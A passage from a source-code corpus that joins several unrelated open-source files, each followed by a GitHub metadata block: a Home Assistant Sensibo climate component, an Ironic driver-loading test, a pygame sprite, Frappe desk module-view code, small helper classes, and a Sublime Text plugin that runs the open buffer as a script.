    # async_timeout API this file was written against; newer releases
    # require `async with` — confirm the pinned version.
    with async_timeout.timeout(TIMEOUT):
        await self._client.async_set_ac_state_property(
            self._id, "targetTemperature", temperature, self._ac_states
        )
async def async_set_fan_mode(self, fan_mode):
    """Set new target fan mode on the device (bounded by TIMEOUT)."""
    with async_timeout.timeout(TIMEOUT):
        await self._client.async_set_ac_state_property(
            self._id, "fanLevel", fan_mode, self._ac_states
        )
async def async_set_hvac_mode(self, hvac_mode):
    """Set new target operation mode.

    OFF is translated to switching the unit off; any other mode first
    powers the unit on (if needed) and then writes the native mode.
    """
    if hvac_mode == HVAC_MODE_OFF:
        with async_timeout.timeout(TIMEOUT):
            await self._client.async_set_ac_state_property(
                self._id, "on", False, self._ac_states
            )
        return
    # Turn on if not currently on.
    if not self._ac_states["on"]:
        with async_timeout.timeout(TIMEOUT):
            await self._client.async_set_ac_state_property(
                self._id, "on", True, self._ac_states
            )
    with async_timeout.timeout(TIMEOUT):
        await self._client.async_set_ac_state_property(
            self._id, "mode", HA_TO_SENSIBO[hvac_mode], self._ac_states
        )
async def async_set_swing_mode(self, swing_mode):
    """Set new target swing operation (bounded by TIMEOUT)."""
    with async_timeout.timeout(TIMEOUT):
        await self._client.async_set_ac_state_property(
            self._id, "swing", swing_mode, self._ac_states
        )
async def async_turn_on(self):
    """Turn Sensibo unit on."""
    with async_timeout.timeout(TIMEOUT):
        await self._client.async_set_ac_state_property(
            self._id, "on", True, self._ac_states
        )
async def async_turn_off(self):
    """Turn Sensibo unit off."""
    with async_timeout.timeout(TIMEOUT):
        await self._client.async_set_ac_state_property(
            self._id, "on", False, self._ac_states
        )
async def async_assume_state(self, state):
    """Set external (assumed) state.

    Pushes an on/off write to the device only when the assumed state
    disagrees with the last known AC state; the write is flagged as
    assumed.  For plain on/off states the external override is
    cleared so the normal computed state takes over again.
    """
    change_needed = (state != HVAC_MODE_OFF and not self._ac_states["on"]) or (
        state == HVAC_MODE_OFF and self._ac_states["on"]
    )
    if change_needed:
        with async_timeout.timeout(TIMEOUT):
            await self._client.async_set_ac_state_property(
                self._id,
                "on",
                state != HVAC_MODE_OFF,  # value
                self._ac_states,
                True,  # assumed_state
            )
    if state in [STATE_ON, HVAC_MODE_OFF]:
        self._external_state = None
    else:
        self._external_state = state
async def async_update(self):
    """Retrieve the latest state from the Sensibo servers.

    On client or API errors the entity is marked unavailable instead
    of raising, so HA keeps polling.
    """
    try:
        with async_timeout.timeout(TIMEOUT):
            data = await self._client.async_get_device(self._id, _FETCH_FIELDS)
        self._do_update(data)
    except (aiohttp.client_exceptions.ClientError, pysensibo.SensiboError):
        _LOGGER.warning("Failed to connect to Sensibo servers")
        self._available = False
|
{
"content_hash": "29226b7d46e9e8f9b9c3ebd7a31b9f79",
"timestamp": "",
"source": "github",
"line_count": 402,
"max_line_length": 88,
"avg_line_length": 32.039800995024876,
"alnum_prop": 0.593944099378882,
"repo_name": "adrienbrault/home-assistant",
"id": "10ceaa39a38b191283cd52cb603e2346b07a36aa",
"size": "12880",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "homeassistant/components/sensibo/climate.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1795"
},
{
"name": "Python",
"bytes": "32021043"
},
{
"name": "Shell",
"bytes": "4900"
}
],
"symlink_target": ""
}
|
import mock
from stevedore import dispatch
from ironic.common import driver_factory
from ironic.common import exception
from ironic.tests import base
class FakeEp:
    """Minimal stand-in for a stevedore entry point in load-failure tests."""
    name = 'fake'
class DriverLoadTestCase(base.TestCase):
    """Tests for how DriverFactory reacts to driver load failures."""

    def setUp(self):
        super(DriverLoadTestCase, self).setUp()
        # Force each test to re-create the extension manager.
        driver_factory.DriverFactory._extension_manager = None

    def _fake_init_name_err(self, *args, **kwargs):
        # Simulate stevedore reporting an arbitrary (non-Ironic) error.
        kwargs['on_load_failure_callback'](None, FakeEp, NameError('aaa'))

    def _fake_init_driver_err(self, *args, **kwargs):
        # Simulate stevedore reporting an Ironic DriverLoadError.
        kwargs['on_load_failure_callback'](None, FakeEp,
                                           exception.DriverLoadError(
                                               driver='aaa', reason='bbb'))

    def test_driver_load_error_if_driver_enabled(self):
        # An enabled driver that fails to load must surface the error.
        self.config(enabled_drivers=['fake'])
        with mock.patch.object(dispatch.NameDispatchExtensionManager,
                               '__init__', self._fake_init_driver_err):
            self.assertRaises(exception.DriverLoadError,
                              driver_factory.DriverFactory._init_extension_manager)

    def test_wrap_in_driver_load_error_if_driver_enabled(self):
        # Arbitrary load exceptions are wrapped into DriverLoadError.
        self.config(enabled_drivers=['fake'])
        with mock.patch.object(dispatch.NameDispatchExtensionManager,
                               '__init__', self._fake_init_name_err):
            self.assertRaises(exception.DriverLoadError,
                              driver_factory.DriverFactory._init_extension_manager)

    @mock.patch.object(dispatch.NameDispatchExtensionManager, 'names')
    def test_no_driver_load_error_if_driver_disabled(self, mock_em):
        # A failing driver that is NOT enabled must not break startup.
        self.config(enabled_drivers=[])
        with mock.patch.object(dispatch.NameDispatchExtensionManager,
                               '__init__', self._fake_init_driver_err):
            driver_factory.DriverFactory._init_extension_manager()
        mock_em.assert_called_once_with()
|
{
"content_hash": "38ed7bf80097189cd9d61309bca12218",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 79,
"avg_line_length": 41.46808510638298,
"alnum_prop": 0.6269881990764494,
"repo_name": "rackerlabs/ironic",
"id": "9749befdf0630de13536d6fae119ac26c81b762c",
"size": "2538",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "ironic/tests/test_driver_factory.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2267329"
}
],
"symlink_target": ""
}
|
import pygame
from random import randint
import os
EXEC_DIR = os.path.dirname(__file__)
class Reward(pygame.sprite.Sprite):
    """The main reward sprite: a treat whose image changes per bite.

    Fix: the original loaded 'reward.png' twice (once for the initial
    image and once for whole_image); the initial image now reuses the
    single loaded surface.
    """

    def __init__(self, position):
        """Create the reward at *position* (top-left pixel coords)."""
        pygame.sprite.Sprite.__init__(self)
        # Load each stage image exactly once.
        self.whole_image = pygame.image.load('reward.png')
        self.bite1_image = pygame.image.load('reward_bite1.png')
        self.bite2_image = pygame.image.load('reward_bite2.png')
        self.image = self.whole_image
        self.rect = self.image.get_rect()
        self.rect.topleft = position
        self.position = self.rect.topleft
        self.bites = 0

    def update(self):
        """Swap the sprite image to match the bite count.

        After the third bite the reward is shown whole again at a
        random position.  NOTE(review): self.bites is presumably reset
        by the caller — not visible here; confirm.
        """
        if self.bites == 1:
            self.image = self.bite1_image
        elif self.bites == 2:
            self.image = self.bite2_image
        elif self.bites == 3:
            self.image = self.whole_image
            self.rect.topleft = [randint(20, 400), randint(20, 400)]
|
{
"content_hash": "77bdee1eb3c9d1d92fd725e48329a4f7",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 68,
"avg_line_length": 34.74074074074074,
"alnum_prop": 0.6044776119402985,
"repo_name": "btnpushnmunky/cupcake",
"id": "d6074f83330e237bf7f48f154028511a2dca9657",
"size": "938",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "reward.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25493"
}
],
"symlink_target": ""
}
|
from .. import ContainerAbilityInterface
from .. import QLayout
from .. import ui_extension
@ui_extension
class Layout(QLayout, ContainerAbilityInterface):
    """QLayout extended with the package's container abilities.

    All behavior comes from QLayout, the mixin, and the
    @ui_extension decorator; no extra members are defined.
    """
    pass
|
{
"content_hash": "799e7a2eb2ccffb3c16779bdca468610",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 49,
"avg_line_length": 20.875,
"alnum_prop": 0.7844311377245509,
"repo_name": "SF-Zhou/quite",
"id": "f7a87c23ef69830cae44f78f8764b9caf91f3203",
"size": "167",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "quite/gui/widgets/layout.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "74686"
}
],
"symlink_target": ""
}
|
import frappe
import json
from frappe import _
from frappe.boot import get_allowed_pages, get_allowed_reports
from frappe.desk.doctype.desktop_icon.desktop_icon import set_hidden, clear_desktop_icons_cache
from frappe.cache_manager import build_domain_restriced_doctype_cache, build_domain_restriced_page_cache, build_table_count_cache
@frappe.whitelist()
def get(module):
    """Returns data (sections, list of reports, counts) to render module view in desk:
    `/desk/#Module/[name]`."""
    return {"data": get_data(module)}
@frappe.whitelist()
def hide_module(module):
    """Hide the module's desktop icon for the current user and
    invalidate the desktop icon cache."""
    set_hidden(module, frappe.session.user, 1)
    clear_desktop_icons_cache()
def get_table_with_counts():
    """Return cached per-table record counts, rebuilding the cache on a miss."""
    counts = frappe.cache().get_value("information_schema:counts")
    return counts or build_table_count_cache()
def get_data(module, build=True):
    """Get module data for the module view `desk/#Module/[name]`.

    Builds the section list from `config/desktop.py` when present,
    otherwise from the module's DocTypes; then merges duplicate
    sections and applies permissions.  When *build* is True, items
    are additionally annotated with onboarding info (incomplete
    dependencies, record counts).
    """
    doctype_info = get_doctype_info(module)
    data = build_config_from_file(module)
    if not data:
        data = build_standard_config(module, doctype_info)
    else:
        add_custom_doctypes(data, doctype_info)
    add_section(data, _("Custom Reports"), "fa fa-list-alt",
        get_report_list(module))
    data = combine_common_sections(data)
    data = apply_permissions(data)
    # set_last_modified(data)
    if build:
        exists_cache = get_table_with_counts()
        def doctype_contains_a_record(name):
            # Cached "has at least one record" check; single DocTypes
            # always count as existing.
            exists = exists_cache.get(name)
            if not exists:
                if not frappe.db.get_value('DocType', name, 'issingle'):
                    exists = frappe.db.count(name)
                else:
                    exists = True
                exists_cache[name] = exists
            return exists
        for section in data:
            for item in section["items"]:
                # Onboarding
                # First disable based on exists of depends_on list
                doctype = item.get("doctype")
                dependencies = item.get("dependencies") or None
                if not dependencies and doctype:
                    # Default dependency is the item's own doctype.
                    item["dependencies"] = [doctype]
                dependencies = item.get("dependencies")
                if dependencies:
                    incomplete_dependencies = [d for d in dependencies if not doctype_contains_a_record(d)]
                    if len(incomplete_dependencies):
                        item["incomplete_dependencies"] = incomplete_dependencies
                if item.get("onboard"):
                    # Mark Spotlights for initial
                    if item.get("type") == "doctype":
                        name = item.get("name")
                        count = doctype_contains_a_record(name)
                        item["count"] = count
    return data
def build_config_from_file(module):
    """Build module info from `app/config/desktop.py` files across
    all installed apps, filtered by the active domains."""
    scrubbed = frappe.scrub(module)
    sections = []
    for app in frappe.get_installed_apps():
        try:
            sections.extend(get_config(app, scrubbed))
        except ImportError:
            # App has no config module for this desk module.
            pass
    return filter_by_restrict_to_domain(sections)
def filter_by_restrict_to_domain(data):
    """Filter Pages and DocTypes depending on the active Domain(s)."""
    doctypes = frappe.cache().get_value("domain_restricted_doctypes") or build_domain_restriced_doctype_cache()
    pages = frappe.cache().get_value("domain_restricted_pages") or build_domain_restriced_page_cache()
    for section in data:
        # Keep reports unconditionally; pages/doctypes only when allowed.
        section["items"] = [
            item
            for item in section.get("items", [])
            if item.get("name") in pages
            or item.get("name") in doctypes
            or item.get("type") == 'report'
        ]
    return data
def build_standard_config(module, doctype_info):
    """Build standard module data from DocTypes.

    Used when the module has no `config/desktop.py`; groups DocTypes
    into Documents / Setup sections and appends standard reports.
    """
    if not frappe.db.get_value("Module Def", module):
        frappe.throw(_("Module Not Found"))
    data = []
    add_section(data, _("Documents"), "fa fa-star",
        [d for d in doctype_info if d.document_type in ("Document", "Transaction")])
    add_section(data, _("Setup"), "fa fa-cog",
        [d for d in doctype_info if d.document_type in ("Master", "Setup", "")])
    add_section(data, _("Standard Reports"), "fa fa-list",
        get_report_list(module, is_standard="Yes"))
    return data
def add_section(data, label, icon, items):
    """Append a section dict to *data*; a section with no items is skipped."""
    if not items:
        return
    data.append({"label": label, "icon": icon, "items": items})
def add_custom_doctypes(data, doctype_info):
    """Adds Custom DocTypes to modules setup via `config/desktop.py`."""
    custom_documents = [
        d for d in doctype_info
        if d.custom and d.document_type in ("Document", "Transaction")
    ]
    custom_setup = [
        d for d in doctype_info
        if d.custom and d.document_type in ("Setup", "Master", "")
    ]
    add_section(data, _("Documents"), "fa fa-star", custom_documents)
    add_section(data, _("Setup"), "fa fa-cog", custom_setup)
def get_doctype_info(module):
    """Returns list of non-child DocTypes for the given module,
    restricted to the active domains; descriptions are translated
    and document_type is normalized to a string."""
    active_domains = frappe.get_active_domains()
    doctype_info = frappe.get_all("DocType", filters={
        "module": module,
        "istable": 0
    }, or_filters={
        "ifnull(restrict_to_domain, '')": "",
        "restrict_to_domain": ("in", active_domains)
    }, fields=["'doctype' as type", "name", "description", "document_type",
        "custom", "issingle"], order_by="custom asc, document_type desc, name asc")
    for d in doctype_info:
        d.document_type = d.document_type or ""
        d.description = _(d.description or "")
    return doctype_info
def combine_common_sections(data):
    """Combine sections declared in separate apps.

    Sections sharing a label are merged into the first occurrence
    (its items list is extended in place); first-seen order is kept.
    """
    merged = {}
    for section in data:
        label = section["label"]
        if label in merged:
            merged[label]["items"] += section["items"]
        else:
            merged[label] = section
    return list(merged.values())
def apply_permissions(data):
    """Drop items the session user may not see.

    Keeps doctype items the user can read, allowed pages/reports and
    help items; country-specific items for other countries are
    removed.  Sections left without items are dropped entirely.
    """
    default_country = frappe.db.get_default("country")
    user = frappe.get_user()
    user.build_permissions()
    allowed_pages = get_allowed_pages()
    allowed_reports = get_allowed_reports()
    new_data = []
    for section in data:
        new_items = []
        for item in (section.get("items") or []):
            item = frappe._dict(item)
            if item.country and item.country!=default_country:
                continue
            if ((item.type=="doctype" and item.name in user.can_read)
                or (item.type=="page" and item.name in allowed_pages)
                or (item.type=="report" and item.name in allowed_reports)
                or item.type=="help"):
                new_items.append(item)
        if new_items:
            # Shallow-copy so the original section list is untouched.
            new_section = section.copy()
            new_section["items"] = new_items
            new_data.append(new_section)
    return new_data
def get_disabled_reports():
    """Return the set of disabled report names, cached per request
    on frappe.local."""
    if not hasattr(frappe.local, "disabled_reports"):
        frappe.local.disabled_reports = set(r.name for r in frappe.get_all("Report", {"disabled": 1}))
    return frappe.local.disabled_reports
def get_config(app, module):
    """Load module info from `[app].config.[module]`.

    Filters out sections whose `condition` is falsy and disabled
    reports, and backfills missing `name`/`label` on items.
    Raises ImportError when the app has no such config module.
    """
    config = frappe.get_module("{app}.config.{module}".format(app=app, module=module))
    config = config.get_data()
    sections = [s for s in config if s.get("condition", True)]
    disabled_reports = get_disabled_reports()
    for section in sections:
        items = []
        for item in section["items"]:
            if item["type"]=="report" and item["name"] in disabled_reports:
                continue
            # some module links might not have name
            if not item.get("name"):
                item["name"] = item.get("label")
            if not item.get("label"):
                item["label"] = _(item.get("name"))
            items.append(item)
        section['items'] = items
    return sections
def config_exists(app, module):
    """Return True when `[app].config.[module]` is importable."""
    try:
        frappe.get_module("{app}.config.{module}".format(app=app, module=module))
    except ImportError:
        return False
    return True
def add_setup_section(config, app, module, label, icon):
    """Add common sections to `/desk#Module/Setup`.

    Missing app config modules are ignored silently (best effort).
    """
    try:
        setup_section = get_setup_section(app, module, label, icon)
        if setup_section:
            config.append(setup_section)
    except ImportError:
        pass
def get_setup_section(app, module, label, icon):
    """Get the setup section from a module (for the global Setup page);
    returns None when the module declares no Setup section."""
    for section in get_config(app, module):
        if section.get("label") == _("Setup"):
            return {"label": label, "icon": icon, "items": section["items"]}
def get_onboard_items(app, module):
    """Return the module's onboarding items, falling back to all
    items when none is explicitly marked ``onboard``."""
    try:
        sections = get_config(app, module)
    except ImportError:
        return []
    onboard_items = []
    fallback_items = []
    if not sections:
        doctype_info = get_doctype_info(module)
        sections = build_standard_config(module, doctype_info)
    for section in sections:
        for item in section["items"]:
            if item.get("onboard", 0) == 1:
                onboard_items.append(item)
            # in case onboard is not set
            fallback_items.append(item)
    # NOTE(review): this early return looks redundant — the final
    # `onboard_items or fallback_items` already returns any non-empty
    # onboard_items list; confirm before simplifying.
    if len(onboard_items) > 5:
        return onboard_items
    return onboard_items or fallback_items
@frappe.whitelist()
def get_links_for_module(app, module):
    """Return {value, label} pairs for every link of the module."""
    return [
        {'value': link.get('name'), 'label': link.get('label')}
        for link in get_links(app, module)
    ]
def get_links(app, module):
    """Return the flat list of link items declared by the module's
    config; empty when the app has no config for the module."""
    try:
        sections = get_config(app, frappe.scrub(module))
    except ImportError:
        return []
    return [item for section in sections for item in section['items']]
@frappe.whitelist()
def get_desktop_settings():
    """Return the user's modules grouped by category, with the user's
    saved ordering, per-module link selection and hidden modules
    applied on top of the defaults."""
    from frappe.config import get_modules_from_all_apps_for_user
    all_modules = get_modules_from_all_apps_for_user()
    home_settings = get_home_settings()
    modules_by_name = {}
    for m in all_modules:
        modules_by_name[m['module_name']] = m
    module_categories = ['Modules', 'Domains', 'Places', 'Administration']
    user_modules_by_category = {}
    user_saved_modules_by_category = home_settings.modules_by_category or {}
    user_saved_links_by_module = home_settings.links_by_module or {}
    def apply_user_saved_links(module):
        # Replace the module's default links with the user's saved
        # subset/order, dropping links that no longer exist.
        module = frappe._dict(module)
        all_links = get_links(module.app, module.module_name)
        module_links_by_name = {}
        for link in all_links:
            module_links_by_name[link['name']] = link
        if module.module_name in user_saved_links_by_module:
            user_links = frappe.parse_json(user_saved_links_by_module[module.module_name])
            module.links = [module_links_by_name[l] for l in user_links if l in module_links_by_name]
        return module
    for category in module_categories:
        if category in user_saved_modules_by_category:
            # User has a saved ordering for this category.
            user_modules = user_saved_modules_by_category[category]
            user_modules_by_category[category] = [apply_user_saved_links(modules_by_name[m]) \
                for m in user_modules if modules_by_name.get(m)]
        else:
            user_modules_by_category[category] = [apply_user_saved_links(m) \
                for m in all_modules if m.get('category') == category]
    # filter out hidden modules
    if home_settings.hidden_modules:
        for category in user_modules_by_category:
            hidden_modules = home_settings.hidden_modules or []
            modules = user_modules_by_category[category]
            user_modules_by_category[category] = [module for module in modules if module.module_name not in hidden_modules]
    return user_modules_by_category
@frappe.whitelist()
def update_hidden_modules(category_map):
    """Apply per-category show/hide changes to the user's home
    settings and return the refreshed desktop settings.

    *category_map* maps category -> {"added": [...], "removed": [...]}
    where "added" means newly shown and "removed" newly hidden.
    """
    category_map = frappe.parse_json(category_map)
    home_settings = get_home_settings()
    saved_hidden_modules = home_settings.hidden_modules or []
    for category in category_map:
        config = frappe._dict(category_map[category])
        saved_hidden_modules += config.removed or []
        saved_hidden_modules = [d for d in saved_hidden_modules if d not in (config.added or [])]
        if home_settings.get('modules_by_category') and home_settings.modules_by_category.get(category):
            # Newly shown modules must also appear in the saved ordering.
            module_placement = [d for d in (config.added or []) if d not in home_settings.modules_by_category[category]]
            home_settings.modules_by_category[category] += module_placement
    home_settings.hidden_modules = saved_hidden_modules
    set_home_settings(home_settings)
    return get_desktop_settings()
@frappe.whitelist()
def update_global_hidden_modules(modules):
    """Replace the globally blocked modules (stored on the
    Administrator user); System Manager only."""
    modules = frappe.parse_json(modules)
    frappe.only_for('System Manager')
    doc = frappe.get_doc('User', 'Administrator')
    doc.set('block_modules', [])
    for module in modules:
        doc.append('block_modules', {
            'module': module
        })
    doc.save(ignore_permissions=True)
    return get_desktop_settings()
@frappe.whitelist()
def update_modules_order(module_category, modules):
    """Persist the user's module ordering for one category."""
    modules = frappe.parse_json(modules)
    home_settings = get_home_settings()
    home_settings.modules_by_category = home_settings.modules_by_category or {}
    home_settings.modules_by_category[module_category] = modules
    set_home_settings(home_settings)
@frappe.whitelist()
def update_links_for_module(module_name, links):
    """Persist the user's chosen links for a module and return the
    refreshed desktop settings.

    Fix: removed the redundant
    ``home_settings['links_by_module'].setdefault(module_name, None)``
    call — the key was unconditionally overwritten on the next line,
    so the setdefault was a no-op.
    """
    links = frappe.parse_json(links)
    home_settings = get_home_settings()
    home_settings.setdefault('links_by_module', {})
    home_settings['links_by_module'][module_name] = links
    set_home_settings(home_settings)
    return get_desktop_settings()
@frappe.whitelist()
def get_options_for_show_hide_cards():
    """Return module show/hide options: per-user options always,
    global options only for System Managers."""
    global_options = []
    if 'System Manager' in frappe.get_roles():
        global_options = get_options_for_global_modules()
    return {
        'user_options': get_options_for_user_blocked_modules(),
        'global_options': global_options
    }
@frappe.whitelist()
def get_options_for_global_modules():
    """Return one checkbox option per module across all apps;
    `checked` reflects the Administrator's block list."""
    from frappe.config import get_modules_from_all_apps
    all_modules = get_modules_from_all_apps()
    blocked_modules = frappe.get_doc('User', 'Administrator').get_blocked_modules()
    options = []
    for module in all_modules:
        module = frappe._dict(module)
        options.append({
            'category': module.category,
            'label': module.label,
            'value': module.module_name,
            'checked': module.module_name not in blocked_modules
        })
    return options
@frappe.whitelist()
def get_options_for_user_blocked_modules():
    """Return one checkbox option per module visible to the current
    user; `checked` reflects the user's hidden-modules setting."""
    from frappe.config import get_modules_from_all_apps_for_user
    all_modules = get_modules_from_all_apps_for_user()
    home_settings = get_home_settings()
    hidden_modules = home_settings.hidden_modules or []
    options = []
    for module in all_modules:
        module = frappe._dict(module)
        options.append({
            'category': module.category,
            'label': module.label,
            'value': module.module_name,
            'checked': module.module_name not in hidden_modules
        })
    return options
def set_home_settings(home_settings):
    """Write home settings to both the cache and the User record."""
    frappe.cache().hset('home_settings', frappe.session.user, home_settings)
    frappe.db.set_value('User', frappe.session.user, 'home_settings', json.dumps(home_settings))
@frappe.whitelist()
def get_home_settings():
    """Return the current user's home settings, cache-first with a
    database fallback."""
    def get_from_db():
        settings = frappe.db.get_value("User", frappe.session.user, 'home_settings')
        return frappe.parse_json(settings or '{}')
    home_settings = frappe.cache().hget('home_settings', frappe.session.user, get_from_db)
    return home_settings
def get_module_link_items_from_list(app, module, list_of_link_names):
    """Return the module's link items whose label appears in
    *list_of_link_names*; empty when the app has no module config."""
    try:
        sections = get_config(app, frappe.scrub(module))
    except ImportError:
        return []
    return [
        item
        for section in sections
        for item in section["items"]
        if item.get("label", "") in list_of_link_names
    ]
def set_last_modified(data):
    """Annotate each doctype item with its table's last-modified
    timestamp (currently unused — see the commented call in get_data)."""
    for section in data:
        for item in section["items"]:
            if item["type"] == "doctype":
                item["last_modified"] = get_last_modified(item["name"])
def get_last_modified(doctype):
    """Return the doctype's max(modified) value, cached.

    A missing table yields None; None is cached as the sentinel -1
    (so the negative result is still cached) and translated back to
    None on the way out.
    """
    def _get():
        try:
            last_modified = frappe.get_all(doctype, fields=["max(modified)"], as_list=True, limit_page_length=1)[0][0]
        except Exception as e:
            if frappe.db.is_table_missing(e):
                last_modified = None
            else:
                raise
        # hack: save as -1 so that it is cached
        if last_modified is None:
            last_modified = -1
        return last_modified
    last_modified = frappe.cache().hget("last_modified", doctype, _get)
    if last_modified==-1:
        last_modified = None
    return last_modified
def get_report_list(module, is_standard="No"):
    """Returns list of new style reports for modules."""
    reports = frappe.get_list("Report", fields=["name", "ref_doctype", "report_type"], filters=
        {"is_standard": is_standard, "disabled": 0, "module": module},
        order_by="name")
    return [
        {
            "type": "report",
            "doctype": r.ref_doctype,
            "is_query_report": 1 if r.report_type in ("Query Report", "Script Report", "Custom Report") else 0,
            "label": _(r.name),
            "name": r.name,
        }
        for r in reports
    ]
|
{
"content_hash": "985af5eb4c390a85e102d19fa9674722",
"timestamp": "",
"source": "github",
"line_count": 552,
"max_line_length": 129,
"avg_line_length": 28.628623188405797,
"alnum_prop": 0.6952477377713092,
"repo_name": "almeidapaulopt/frappe",
"id": "7a9c211c3c3d395cf3a1f8791301514b4466fe5c",
"size": "15901",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "frappe/desk/moduleview.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "67734"
},
{
"name": "HTML",
"bytes": "245760"
},
{
"name": "JavaScript",
"bytes": "2345089"
},
{
"name": "Less",
"bytes": "25489"
},
{
"name": "Makefile",
"bytes": "99"
},
{
"name": "Python",
"bytes": "3436599"
},
{
"name": "SCSS",
"bytes": "248606"
},
{
"name": "Shell",
"bytes": "3505"
},
{
"name": "Vue",
"bytes": "96912"
}
],
"symlink_target": ""
}
|
import tests.model_control.test_ozone_custom_models_enabled as testmod

# Build one ozone model combination:
# transformation=Difference, trend=PolyTrend, cycle=Seasonal_Second, AR=LSTM.
testmod.build_model( ['Difference'] , ['PolyTrend'] , ['Seasonal_Second'] , ['LSTM'] );
|
{
"content_hash": "6a80cdc206dc7020ca2fff814dc085e9",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 87,
"avg_line_length": 40,
"alnum_prop": 0.7125,
"repo_name": "antoinecarme/pyaf",
"id": "7209b6080d9c674f6450196fa9898398f2766a79",
"size": "160",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/model_control/detailed/transf_Difference/model_control_one_enabled_Difference_PolyTrend_Seasonal_Second_LSTM.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "6773299"
},
{
"name": "Procfile",
"bytes": "24"
},
{
"name": "Python",
"bytes": "54209093"
},
{
"name": "R",
"bytes": "807"
},
{
"name": "Shell",
"bytes": "3619"
}
],
"symlink_target": ""
}
|
"""
/get/client/ resource
"""
from zunzuncito import tools
class APIResource(object):
    """Handler for the /get/client/ resource."""

    def dispatch(self, request, response):
        """Log the request details as JSON and return the module name."""
        details = {
            'API': request.version,
            'Method': request.method,
            'URI': request.URI,
            'path': request.path,
            'vroot': request.vroot,
        }
        request.log.debug(tools.log_json(details, True))
        return __name__
|
{
"content_hash": "27c48cccb2cdac368ba3a7e5f7399501",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 42,
"avg_line_length": 19.75,
"alnum_prop": 0.5468354430379747,
"repo_name": "nbari/zunzuncito",
"id": "1780782bcf6c00ce580dda2550edfba9dc84a960",
"size": "395",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "my_api/default/v0/zun_get/zun_client/zun_client.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "4811"
},
{
"name": "Python",
"bytes": "126204"
},
{
"name": "Shell",
"bytes": "586"
}
],
"symlink_target": ""
}
|
class IncorrectTextFieldCount(Exception):
    """Raise if there is an incorrect number of text fields in
    the QuestionFormAnswer.

    Fix: the original ``__init__`` executed ``raise self`` on the
    half-constructed instance and discarded *message*; it now stores
    the message via the normal Exception protocol so ``str(exc)``
    works and callers raise the exception themselves.
    """

    def __init__(self, message):
        super().__init__(message)
|
{
"content_hash": "bebe8ecb8f9b852229dccd6207c43bf4",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 63,
"avg_line_length": 38,
"alnum_prop": 0.6842105263157895,
"repo_name": "tturpen/django-csaesrapp",
"id": "2d290df4efa4fd223354cd7d5ab3c94edc879ad1",
"size": "860",
"binary": false,
"copies": "1",
"ref": "refs/heads/version01",
"path": "apps/mturk/exceptions.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "5806"
},
{
"name": "Python",
"bytes": "169679"
},
{
"name": "Shell",
"bytes": "649"
}
],
"symlink_target": ""
}
|
import sublime, sublime_plugin, subprocess, threading, base64, os, tempfile
class RunScriptTestCommand(sublime_plugin.TextCommand):
    """Sublime Text command that runs the current buffer as a script.

    The buffer is written to a temp file, executed with an interpreter
    chosen by the buffer's syntax scope, and the output is streamed to
    an output panel.
    """

    def run(self, edit):
        """Entry point invoked by Sublime; runs the script off-thread."""
        self.settings = sublime.load_settings('ScriptTestTool.sublime-settings')
        script = self.get_raw_script()
        # Run asynchronously so the UI thread is not blocked.
        sublime.set_timeout_async(lambda: self.execute_script(script), 0)

    def get_raw_script(self):
        """Return the full text of the current view."""
        region = sublime.Region(0, self.view.size())
        content = self.view.substr(region)
        return content

    def execute_script(self, script):
        """Write *script* to a temp file, execute it and show output.

        The temp file is always removed, even when launching fails.
        """
        temp_file = tempfile.NamedTemporaryFile(mode="w+", delete=False, encoding="utf-8")
        try:
            temp_file.write(script)
            temp_file.close()
            self.start_output()
            print('ScriptTestTool: starting', self.get_proccess_args(temp_file.name))
            proc = subprocess.Popen(
                self.get_proccess_args(temp_file.name),
                stdout = subprocess.PIPE,
                stderr = subprocess.PIPE,
                startupinfo = self.get_startup_info()
            )
            self.print_communicate(proc)
            self.print_message("\n\nProcess ended, return code: {0}".format(proc.returncode))
        except BaseException as err:
            self.print_message("Error: {0}".format(err))
        finally:
            os.remove(temp_file.name)

    def get_proccess_args(self, file_name):
        """Build the command line for the buffer's syntax scope,
        substituting the temp file path for the '%file%' placeholder.
        Returns None when no command is configured for the scope."""
        point = self.view.sel()[0]
        scope = self.view.scope_name(point.a).split()[0]
        command = self.get_setting('scopes_commands').get(scope) or self.get_setting('scopes_commands').get('default')
        args = self.get_setting('commands_args').get(command)
        if args == None:
            return
        result = [file_name if item == '%file%' else item for item in args]
        return result

    def get_startup_info(self):
        """On Windows, suppress the console window of the child process."""
        startupinfo = None
        if os.name == 'nt':
            startupinfo = subprocess.STARTUPINFO()
            startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
        return startupinfo

    def get_setting(self, name, default = None):
        """Read a value from the plugin settings."""
        return self.settings.get(name, default)

    def start_output(self):
        """(Re)create and show the 'stt' output panel."""
        self.output = sublime.active_window().create_output_panel('stt')
        sublime.active_window().run_command("hide_panel", {"panel": "output.stt", "toggle": False})
        sublime.active_window().run_command("show_panel", {"panel": "output.stt", "toggle": False})

    def print_message(self, message):
        """Append *message* to the output panel."""
        self.output.run_command('append', {'characters': message, 'force': True, 'scroll_to_end': self.get_setting('scroll_output_to_end', True)})

    def print_communicate(self, proc):
        """Wait for the process and print stderr if any, else stdout."""
        (results, errors) = proc.communicate()
        if errors != b'':
            output = errors
